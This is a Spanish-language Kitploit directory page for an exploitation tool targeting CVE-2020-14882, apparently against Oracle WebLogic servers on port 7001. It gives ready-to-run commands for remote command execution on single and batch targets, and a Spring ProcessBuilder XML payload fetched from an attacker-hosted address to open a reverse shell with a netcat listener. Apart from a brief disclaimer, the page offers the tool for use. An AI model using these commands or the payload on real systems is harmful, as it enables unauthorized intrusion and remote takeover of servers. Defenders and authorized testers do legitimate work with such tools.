Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-14882_ALL — Herramienta de explotación integral CVE-2020-14882_ALL, admite detección de eco de comandos, eco de comandos por lotes, ejecución de comandos sin eco mediante XML externo y otras funcionalidades. | Kitploit
Herramientas/GitHubGitHub/ggyao/cve-2020-14882_all
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubggyao/cve-2020-14882_all

CVE-2020-14882_ALL

Herramienta de explotación integral CVE-2020-14882_ALL, admite detección de eco de comandos, eco de comandos por lotes, ejecución de comandos sin eco mediante XML externo y otras funcionalidades.

Ver Repositorio
144386hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-14882_ALL

CVE-2020-14882_ALL es una herramienta de explotación integral que admite detección de eco de comandos, eco de comandos por lotes, ejecución de comandos sin eco mediante archivos xml externos, etc.

Módulos requeridos: requests, http.client

(La herramienta está destinada únicamente a pruebas de seguridad autorizadas; no la utilice con fines ilegales. El autor no se hace responsable por el uso indebido de la misma.)

Versiones conocidas del módulo de eco de comandos: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

Opciones

Función 1: Eco de comandos

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

Función 2: Eco de comandos por lotes

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

Formato de target.txt: http://x.x.x.x:xx, uno por línea.

Función 3: Ejecución de comandos sin eco mediante archivo xml externo

  1. Tomando como ejemplo un reverse shell de Linux, edite el archivo poc.xml e inicie la escucha con Python.
root@kitploit:~
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Inicie la escucha con Python.

Inicie la escucha con nc.

  1. Utilice la opción -x para especificar la ruta del archivo xml y envíe el payload.

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

  1. Reciba correctamente la shell.

Descargar herramienta